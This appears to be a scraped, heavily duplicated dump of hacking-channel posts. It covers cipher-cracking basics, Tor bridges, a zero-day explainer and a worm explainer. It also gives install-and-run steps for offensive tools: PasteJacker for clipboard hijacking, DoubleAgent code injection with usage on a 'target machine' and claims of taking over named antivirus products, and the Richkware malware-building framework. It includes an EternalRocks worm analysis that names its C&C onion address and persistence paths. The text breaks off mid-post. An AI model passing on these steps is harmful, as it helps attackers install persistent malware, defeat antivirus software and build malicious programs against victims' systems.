โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ STEPS FOR CRACKING ANY CYPHER LANGUAGE PROGRAM :
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) The Reverse Cipher
The reiverse cipher encrypts a message by printing it in reverse order. So "Hello, world!" encrypts to "!dlrow , olleH". To Decrypt, or get the original message, you simpy reverse the encrypted message. The encryption and the decryption steps are the same .
2) The Caesar Cipher
The reverse cipher encrypts the same way. But the Caesar cipher uses keys, which encrypt the message differently depending on which key is used. The keys for the Caesar cipher are the integers from 0 to 25. Even if a cryptanalyst knows the Caesar cipher was used, that alone doesn't give them enough information to break the cipher. The must also know the key.
3) Hacking The Caesar Cipher With Brute-Force
We can hack the Caesar cipher by using a cryptanalytic technique called brute-force. A brute-force attack tries every possible decryption key for a cipher.
4) Encrypting with Transposition Cipher
The transposition cipher is more difficult to brute force because the number of possible keys depends on the message's length. There are many different types of transposition ciphers, including the rail fence cipher, route cipher, Myszkowski transposition cipher. This example covers a simple transposition cipher called the columnar transposition cipher
5) Decrypting with the Transposition Cipher
Steps for decrypting the Transposition Cipher :
> Calculate the number of columns you need by dividing the length of the message by the key and then rounding up.
> Draw boxes in columns and rows. Use the number of columns and you calculated before. The number of rows is the same as the key
> Calculate the number of boxes to shade in by taking the total number of boxes and subtracking the length of the ciphertext message.
> Shade in the number of boxes you calculated in step 3 at the bottom of the rightmost column.
> Fill in the characters of the ciphertext starting at the top row and going from left to right. Skip any of the shaded boxes.
> Get the plaintext by reading the leftmost column from top to bottom, and continuing to do the same in each column.
6) Programming A Program to Test Your Program
> You can not be absolutely sure the programs always work unless you test the encryptMessage() and decryptMessage() functions with all sort of message and key parameter values. But this would take a lot of time because you would have to type a message in the encryption program, set the key, run the encryption program, paste the cipher txt into the decryption program, set the key, and then run the decryption program.
7) Encrypting And Decrypting Files
In previous examples, our programs have only worked on small messages that we type directly into the source code as string values. The cipher program we will make in this chapter will allow us to encrypt and decrypt entire files, which can be millions of characters in size.
8) Detecting English Programmatically
Previously, we used the transposition file cipher to encrypt and decrypt entire files, but we haven't tried writing a brute-force program to hack the cipher yet. Messages encrypted with the transposition file cipher can have thousand of possible keys, which your computer can still easily brute-force, but you would then have to look through thousands of decryptions to find the one correct plaintext. As you can imagine, this can be a big problem, but there is a work-around.
> When the computer decrypts a message using the wrong key, the resulting string is garbage text instead of English text. We can program the computer to recognize when a decrypted message is English. That way, if the computer decrypts using the wrong key, it knows to go on and try the next possible key.
๐ฆ STEPS FOR CRACKING ANY CYPHER LANGUAGE PROGRAM :
t.me/UnderCodeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) The Reverse Cipher
The reiverse cipher encrypts a message by printing it in reverse order. So "Hello, world!" encrypts to "!dlrow , olleH". To Decrypt, or get the original message, you simpy reverse the encrypted message. The encryption and the decryption steps are the same .
2) The Caesar Cipher
The reverse cipher encrypts the same way. But the Caesar cipher uses keys, which encrypt the message differently depending on which key is used. The keys for the Caesar cipher are the integers from 0 to 25. Even if a cryptanalyst knows the Caesar cipher was used, that alone doesn't give them enough information to break the cipher. The must also know the key.
3) Hacking The Caesar Cipher With Brute-Force
We can hack the Caesar cipher by using a cryptanalytic technique called brute-force. A brute-force attack tries every possible decryption key for a cipher.
4) Encrypting with Transposition Cipher
The transposition cipher is more difficult to brute force because the number of possible keys depends on the message's length. There are many different types of transposition ciphers, including the rail fence cipher, route cipher, Myszkowski transposition cipher. This example covers a simple transposition cipher called the columnar transposition cipher
5) Decrypting with the Transposition Cipher
Steps for decrypting the Transposition Cipher :
> Calculate the number of columns you need by dividing the length of the message by the key and then rounding up.
> Draw boxes in columns and rows. Use the number of columns and you calculated before. The number of rows is the same as the key
> Calculate the number of boxes to shade in by taking the total number of boxes and subtracking the length of the ciphertext message.
> Shade in the number of boxes you calculated in step 3 at the bottom of the rightmost column.
> Fill in the characters of the ciphertext starting at the top row and going from left to right. Skip any of the shaded boxes.
> Get the plaintext by reading the leftmost column from top to bottom, and continuing to do the same in each column.
6) Programming A Program to Test Your Program
> You can not be absolutely sure the programs always work unless you test the encryptMessage() and decryptMessage() functions with all sort of message and key parameter values. But this would take a lot of time because you would have to type a message in the encryption program, set the key, run the encryption program, paste the cipher txt into the decryption program, set the key, and then run the decryption program.
7) Encrypting And Decrypting Files
In previous examples, our programs have only worked on small messages that we type directly into the source code as string values. The cipher program we will make in this chapter will allow us to encrypt and decrypt entire files, which can be millions of characters in size.
8) Detecting English Programmatically
Previously, we used the transposition file cipher to encrypt and decrypt entire files, but we haven't tried writing a brute-force program to hack the cipher yet. Messages encrypted with the transposition file cipher can have thousand of possible keys, which your computer can still easily brute-force, but you would then have to look through thousands of decryptions to find the one correct plaintext. As you can imagine, this can be a big problem, but there is a work-around.
> When the computer decrypts a message using the wrong key, the resulting string is garbage text instead of English text. We can program the computer to recognize when a decrypted message is English. That way, if the computer decrypts using the wrong key, it knows to go on and try the next possible key.
Eventually, when the computer tries a key that decrypts to english text, it can stop and bring that key to your attention, sparing you from having to look through thousands of incorrect decryptions.
9) Hacking The Transposition Cipher
We will use a brute-force approach to hack the transposition cipher. Of the thousands of keys that could possibly be associated with the transposition cipher, the correct key should be the only one that results in legible English. Using the detectEnglish().py module we wrote in previous section, our transposition cipher hacker program will help us find the correct key.
10) A Modular Arithmetic Module For the Affine Cipher
We will learn about the multiplicative cipher and the affine cipher. The multiplicative cipher is similar to the Caesar cipher but encrypts using multiplication rather than addition. The affine cipher combines the multiplicative cipher and the Caesar cipher, resulting in a stronger and more reliable encryption.
11) Programming The Affine Cipher
We will build and run programs to implement the affine cipher. Because the affine cipher cipher uses two different ciphers as part of its encryption process, it needs two keys: one for the multiplicative cipher and another for the Caesar cipher. For the affine program, we will split a single integer into two keys.
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
9) Hacking The Transposition Cipher
We will use a brute-force approach to hack the transposition cipher. Of the thousands of keys that could possibly be associated with the transposition cipher, the correct key should be the only one that results in legible English. Using the detectEnglish().py module we wrote in previous section, our transposition cipher hacker program will help us find the correct key.
10) A Modular Arithmetic Module For the Affine Cipher
We will learn about the multiplicative cipher and the affine cipher. The multiplicative cipher is similar to the Caesar cipher but encrypts using multiplication rather than addition. The affine cipher combines the multiplicative cipher and the Caesar cipher, resulting in a stronger and more reliable encryption.
11) Programming The Affine Cipher
We will build and run programs to implement the affine cipher. Because the affine cipher cipher uses two different ciphers as part of its encryption process, it needs two keys: one for the multiplicative cipher and another for the Caesar cipher. For the affine program, we will split a single integer into two keys.
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPasteJacker : Hacking Systems With The Automation Of PasteJacking Attacks 2019
> In short, Pastejacking is a method that malicious websites employ to take control of your computersโ clipboard and change its content to something harmful without your knowledge.
instagram.com/UnderCodeTestingCompany
๐ฆREQUIREMENTS :
>Python 3 and setuptools module.
> Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).
> Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course.
> Third-party library ncurses-dev for Ubuntu (Thanks for @mhaskar).
> Root access.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/D4Vinci/PasteJacker.git
2) sudo python3 -m pip install ./PasteJacker
3) sudo pastejacker
๐ฆTESTED by UNdercOde ON :
> Debian
> Termux(root)
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPasteJacker : Hacking Systems With The Automation Of PasteJacking Attacks 2019
> In short, Pastejacking is a method that malicious websites employ to take control of your computersโ clipboard and change its content to something harmful without your knowledge.
instagram.com/UnderCodeTestingCompany
๐ฆREQUIREMENTS :
>Python 3 and setuptools module.
> Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).
> Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course.
> Third-party library ncurses-dev for Ubuntu (Thanks for @mhaskar).
> Root access.
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/D4Vinci/PasteJacker.git
2) sudo python3 -m pip install ./PasteJacker
3) sudo pastejacker
๐ฆTESTED by UNdercOde ON :
> Debian
> Termux(root)
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ What is a Zero-Day Exploit?
Zero-day exploit: an advanced cyber attack defined
instagram.com/UndercOdeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) A zero-day vulnerability, at its core, is a flaw. It is an unknown exploit in the wild that exposes a vulnerability in software or hardware and can create complicated problems well before anyone realizes something is wrong. In fact, a zero-day exploit leaves NO opportunity for detection ... at first.
2) Vulnerability timeline
> A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerabilityโhence โzero-day.โ Letโs break down the steps of the window of vulnerability:
3) A companyโs developers create software, but unbeknownst to them it contains a vulnerability.
4) The threat actor spots that vulnerability either before the developer does or acts on it before the developer has a chance to fix it.
5) The attacker writes and implements exploit code while the vulnerability is still open and available
6) After releasing the exploit, either the public recognizes it in the form of identity or information theft or the developer catches it and creates a patch to staunch the cyber-bleeding.
7) Once a patch is written and used, the exploit is no longer called a zero-day exploit. These attacks are rarely discovered right away. In fact, it often takes not just days but months and sometimes years before a developer learns of the vulnerability that led to an attack.
8) Anatomy of an attack: Zero-day
An explanation of zero-day vulnerabilities, how cyber attacks target them, and what you can do to protect your business.
Written by @Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ What is a Zero-Day Exploit?
Zero-day exploit: an advanced cyber attack defined
instagram.com/UndercOdeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) A zero-day vulnerability, at its core, is a flaw. It is an unknown exploit in the wild that exposes a vulnerability in software or hardware and can create complicated problems well before anyone realizes something is wrong. In fact, a zero-day exploit leaves NO opportunity for detection ... at first.
2) Vulnerability timeline
> A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerabilityโhence โzero-day.โ Letโs break down the steps of the window of vulnerability:
3) A companyโs developers create software, but unbeknownst to them it contains a vulnerability.
4) The threat actor spots that vulnerability either before the developer does or acts on it before the developer has a chance to fix it.
5) The attacker writes and implements exploit code while the vulnerability is still open and available
6) After releasing the exploit, either the public recognizes it in the form of identity or information theft or the developer catches it and creates a patch to staunch the cyber-bleeding.
7) Once a patch is written and used, the exploit is no longer called a zero-day exploit. These attacks are rarely discovered right away. In fact, it often takes not just days but months and sometimes years before a developer learns of the vulnerability that led to an attack.
8) Anatomy of an attack: Zero-day
An explanation of zero-day vulnerabilities, how cyber attacks target them, and what you can do to protect your business.
Written by @Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ
Zero-Day Code Injection and Persistence Technique Full by UndercOde:
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
DoubleAgent is a new Zero-Day technique for injecting code and maintaining persistence on a machine (i.e. auto-run).
DoubleAgent can exploit:
> Every Windows version (Windows XP to Windows 10)
> Every Windows architecture (x86 and x64)
> Every Windows user (SYSTEM/Admin/etc.)
> Every target process, including privileged processes (OS/Antivirus/etc.)
> patched windows 8 and higher
1) git clone https://github.com/Cybellum/DoubleAgent
2) cd DoubleAgent
3) Build the main solution twice, once in x86 and once in x64. This step is crucial as it creates both x86 and x64 versions of DoubleAgentDll.dll which is required in order to perform a successful installation.
4) Copy the entire bin folder to the target machine.
Execute the installer:
Usage: DoubleAgent.exe install\uninstall\repair process_name
e.g. DoubleAgent.exe install cmd.exe
๐ฆATTACK VECTOR :
1) Attacking Antivirus & Next Generation Antivirus โ Taking full control of any antivirus by injecting code into it while bypassing all of its self-protection mechanism. The attack has been verified and works on all the major antiviruses including but not limited to: Avast, AVG, Avira, Bitdefender, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Norton, Panda, Quick Heal and Trend Micro. For more details, checkout our Taking Full Control Over Your Antivirus article.
2) Installing Persistent Malware โ Installing malware that can โsurviveโ reboots and are automatically executed once the operating system boots.
3) Hijacking Permissions โ Hijacking the permissions of an existing trusted process to perform malicious operations in disguise of the trusted process. e.g. Exfiltrating data, C&C communication, lateral movement, stealing and encrypting sensitive data.
4) Altering Process Behavior โ Modifying the behavior of the process. e.g. Installing backdoors, weakening encryption algorithms, etc.
5) Attacking Other Users/Sessions โ Injecting code to processes of other users/sessions (SYSTEM/Admin/etc.).
WELL DONE !~
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ
Zero-Day Code Injection and Persistence Technique Full by UndercOde:
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
DoubleAgent is a new Zero-Day technique for injecting code and maintaining persistence on a machine (i.e. auto-run).
DoubleAgent can exploit:
> Every Windows version (Windows XP to Windows 10)
> Every Windows architecture (x86 and x64)
> Every Windows user (SYSTEM/Admin/etc.)
> Every target process, including privileged processes (OS/Antivirus/etc.)
> patched windows 8 and higher
1) git clone https://github.com/Cybellum/DoubleAgent
2) cd DoubleAgent
3) Build the main solution twice, once in x86 and once in x64. This step is crucial as it creates both x86 and x64 versions of DoubleAgentDll.dll which is required in order to perform a successful installation.
4) Copy the entire bin folder to the target machine.
Execute the installer:
Usage: DoubleAgent.exe install\uninstall\repair process_name
e.g. DoubleAgent.exe install cmd.exe
๐ฆATTACK VECTOR :
1) Attacking Antivirus & Next Generation Antivirus โ Taking full control of any antivirus by injecting code into it while bypassing all of its self-protection mechanism. The attack has been verified and works on all the major antiviruses including but not limited to: Avast, AVG, Avira, Bitdefender, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Norton, Panda, Quick Heal and Trend Micro. For more details, checkout our Taking Full Control Over Your Antivirus article.
2) Installing Persistent Malware โ Installing malware that can โsurviveโ reboots and are automatically executed once the operating system boots.
3) Hijacking Permissions โ Hijacking the permissions of an existing trusted process to perform malicious operations in disguise of the trusted process. e.g. Exfiltrating data, C&C communication, lateral movement, stealing and encrypting sensitive data.
4) Altering Process Behavior โ Modifying the behavior of the process. e.g. Installing backdoors, weakening encryption algorithms, etc.
5) Attacking Other Users/Sessions โ Injecting code to processes of other users/sessions (SYSTEM/Admin/etc.).
WELL DONE !~
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โโโโโ๐๐D๐๐๐ฎ๐D๐โโโโโ
๐ฆHOW TO check Packet Injection capabilities in all connected wireless cards
T.me/UndercOdeTestingOfficial
๐ฆDependencies
1) aircrack-ng::: Install it by executing following command as root in terminal
>apt install aircrack-ng
awk ::: Install it by running following comand as root in terminal
2) apt install gawk
Note : gawk is already installed on most linux distributions
๐ฆSupported distros--> All Debian based, Ubuntu, Fedora, Kali, Arch, OpenSUSE.
๐ฆINSTALLISATION:
1) Download the master zip and extract all files to any location.
https://github.com/Enixes/Injectorist
2) Open terminal and navigate to extracted folder
3) cd /location/of/extraction
4) Gain root access
su Enter root password:____
5)Make the script InjectionCheck executable by-
6)chmod +x InjectionCheck
7)Run the script
./InjectionCheck
8) Now, Injectorist will scan all wireless cards connected for packet injection
@ STEAVE(KL.)
โโโโโโ๐๐D๐๐๐ฎ๐D๐โโโโโ-
๐ฆHOW TO check Packet Injection capabilities in all connected wireless cards
T.me/UndercOdeTestingOfficial
๐ฆDependencies
1) aircrack-ng::: Install it by executing following command as root in terminal
>apt install aircrack-ng
awk ::: Install it by running following comand as root in terminal
2) apt install gawk
Note : gawk is already installed on most linux distributions
๐ฆSupported distros--> All Debian based, Ubuntu, Fedora, Kali, Arch, OpenSUSE.
๐ฆINSTALLISATION:
1) Download the master zip and extract all files to any location.
https://github.com/Enixes/Injectorist
2) Open terminal and navigate to extracted folder
3) cd /location/of/extraction
4) Gain root access
su Enter root password:____
5)Make the script InjectionCheck executable by-
6)chmod +x InjectionCheck
7)Run the script
./InjectionCheck
8) Now, Injectorist will scan all wireless cards connected for packet injection
@ STEAVE(KL.)
โโโโโโ๐๐D๐๐๐ฎ๐D๐โโโโโ-
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆInstall Ubanto On Android Without Root New 2019
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
open Termux and Type :
1) apt update
2) apt upgrade
3) apt install git wget proot -y
4) git clone https://github.com/htr-tech/ubuntu
5) cd ubuntu
6) chmod +x ubuntu.sh
7) bash ubuntu.sh
๐ฆALL In one Command:
> apt update && apt install git wget proot -y && git clone https://github.com/htr-tech/ubuntu && cd ubuntu && chmod +x ubuntu.sh && bash ubuntu.sh
8) Start ubuntu
> bash start.sh
9) Exit ubuntu
> logout
๐ฆTested
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆInstall Ubanto On Android Without Root New 2019
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
open Termux and Type :
1) apt update
2) apt upgrade
3) apt install git wget proot -y
4) git clone https://github.com/htr-tech/ubuntu
5) cd ubuntu
6) chmod +x ubuntu.sh
7) bash ubuntu.sh
๐ฆALL In one Command:
> apt update && apt install git wget proot -y && git clone https://github.com/htr-tech/ubuntu && cd ubuntu && chmod +x ubuntu.sh && bash ubuntu.sh
8) Start ubuntu
> bash start.sh
9) Exit ubuntu
> logout
๐ฆTested
Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW ADD NEW BRIDGE TO TOR BROWSER TESTED
instagram.com/UNderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐
1) Once the bridge is running, find its bridge line. For obfs4, the bridge line is in the file <datadir>/pt_state/obfs4_bridgeline.txt.
2) You need to insert the external IP/port, and the fingerprint from the file <datadir>/fingerprint.
3) File a new ticket that contains the bridge line.
Component: Applications/Tor Browser
Keywords: tbb-bridges
4) Make a pull request at โhttps://github.com/OpenObservatory/ooni-resources that adds the new bridge's IP/port to the file bridge_reachability/tor-bridges-ip-port.csv. (This will cause OONI to start testing the reachability of the new bridge.)
Thats all!
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOW ADD NEW BRIDGE TO TOR BROWSER TESTED
instagram.com/UNderCodeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐
1) Once the bridge is running, find its bridge line. For obfs4, the bridge line is in the file <datadir>/pt_state/obfs4_bridgeline.txt.
2) You need to insert the external IP/port, and the fingerprint from the file <datadir>/fingerprint.
3) File a new ticket that contains the bridge line.
Component: Applications/Tor Browser
Keywords: tbb-bridges
4) Make a pull request at โhttps://github.com/OpenObservatory/ooni-resources that adds the new bridge's IP/port to the file bridge_reachability/tor-bridges-ip-port.csv. (This will cause OONI to start testing the reachability of the new bridge.)
Thats all!
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWHAT IS A WARM MALWARES/VIRUS ?
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) A worm virus is a malicious, self-replicating program that can spread throughout a network without human assistance.
2) Worms cause damage similar to viruses, exploiting holes in security software and potentially stealing sensitive information, corrupting files and installing a back door for remote access to the system, among other issues.
3) Worms often utilize large amounts of memory and bandwidth, so affected servers, networks and individual systems are often overloaded and stop responding.
4) worms are not exactly a viruses. Viruses need a host computer or operating system. The worm program operates alone.
5) The worm is often transmitted via file-sharing networks, information-transport features, email attachments or by clicking links to malicious websites. Once downloaded, the worm takes advantage of a weakness in its target system or tricks a user into executing it. Some worms have a phishing component that entices users to run the malicious code.
6) Internet worms are often designed to exploit new security issues, and search for systems that havenโt installed current software or operating system security updates.
7) Classifications and names of worms include:
> Email-Worm
> IM-Worm
> IRC-Worm
> Net-Worm
> P2P-Worm
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWHAT IS A WARM MALWARES/VIRUS ?
t.me/UndercOdeTestingOfficial
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) A worm virus is a malicious, self-replicating program that can spread throughout a network without human assistance.
2) Worms cause damage similar to viruses, exploiting holes in security software and potentially stealing sensitive information, corrupting files and installing a back door for remote access to the system, among other issues.
3) Worms often utilize large amounts of memory and bandwidth, so affected servers, networks and individual systems are often overloaded and stop responding.
4) worms are not exactly a viruses. Viruses need a host computer or operating system. The worm program operates alone.
5) The worm is often transmitted via file-sharing networks, information-transport features, email attachments or by clicking links to malicious websites. Once downloaded, the worm takes advantage of a weakness in its target system or tricks a user into executing it. Some worms have a phishing component that entices users to run the malicious code.
6) Internet worms are often designed to exploit new security issues, and search for systems that havenโt installed current software or operating system security updates.
7) Classifications and names of worms include:
> Email-Worm
> IM-Worm
> IRC-Worm
> Net-Worm
> P2P-Worm
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ EternalRocks worm(virus ) BREAKED WINDOWS HACK TOOL
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through public (The Shadow Brokers NSA dump) SMB exploits: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with related programs: DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.
ยป taskhost.exe properties
> First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C ( ubgdgno5eswkhmpy. onion) communication requesting further instructions (e.g. installation of new components).
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Downloading required .NET components (first stage)
> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg
> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants
2) Appendix
> Decompilation of an older sample
C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d
3) Globals
> Network traffic capture (PCAP)
4) Windows 7 x64 SP1 Honeypot # initial exploitation capture ]
5) Yara rules
> EternalRocks.yara
๐ฆ Debug strings
> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
> C:\Users\tmc\Documents\DownLoader\Project1.vbp
> C:\Users\tmc\Documents\TorUnzip\Project1.vbp
> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb
> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb
6) Now Download .zip file
> https://github.com/stamparm/EternalRocks/archive/master.zip
๐ฆFile paths
> c:\Program Files\Microsoft Updates\
> Scheduled tasks
> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily
> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ EternalRocks worm(virus ) BREAKED WINDOWS HACK TOOL
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through public (The Shadow Brokers NSA dump) SMB exploits: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with related programs: DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.
ยป taskhost.exe properties
> First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C ( ubgdgno5eswkhmpy. onion) communication requesting further instructions (e.g. installation of new components).
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Downloading required .NET components (first stage)
> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg
> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants
2) Appendix
> Decompilation of an older sample
C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d
3) Globals
> Network traffic capture (PCAP)
4) Windows 7 x64 SP1 Honeypot # initial exploitation capture ]
5) Yara rules
> EternalRocks.yara
๐ฆ Debug strings
> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
> C:\Users\tmc\Documents\DownLoader\Project1.vbp
> C:\Users\tmc\Documents\TorUnzip\Project1.vbp
> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb
> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb
6) Now Download .zip file
> https://github.com/stamparm/EternalRocks/archive/master.zip
๐ฆFile paths
> c:\Program Files\Microsoft Updates\
> Scheduled tasks
> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily
> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily
@ Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Framework for building Windows malware written in C++ 2019 new release //
> Virus/ Worms /Bot / Spyware/ Keylogger/ Scareware
>Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware
t.me/UndercOdeTestingCompany
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/richkmeli/Richkware
2) cd Richware
3) Open main.cpp, and create an instance of Richkware.
4) With Richkware-Manager-Server
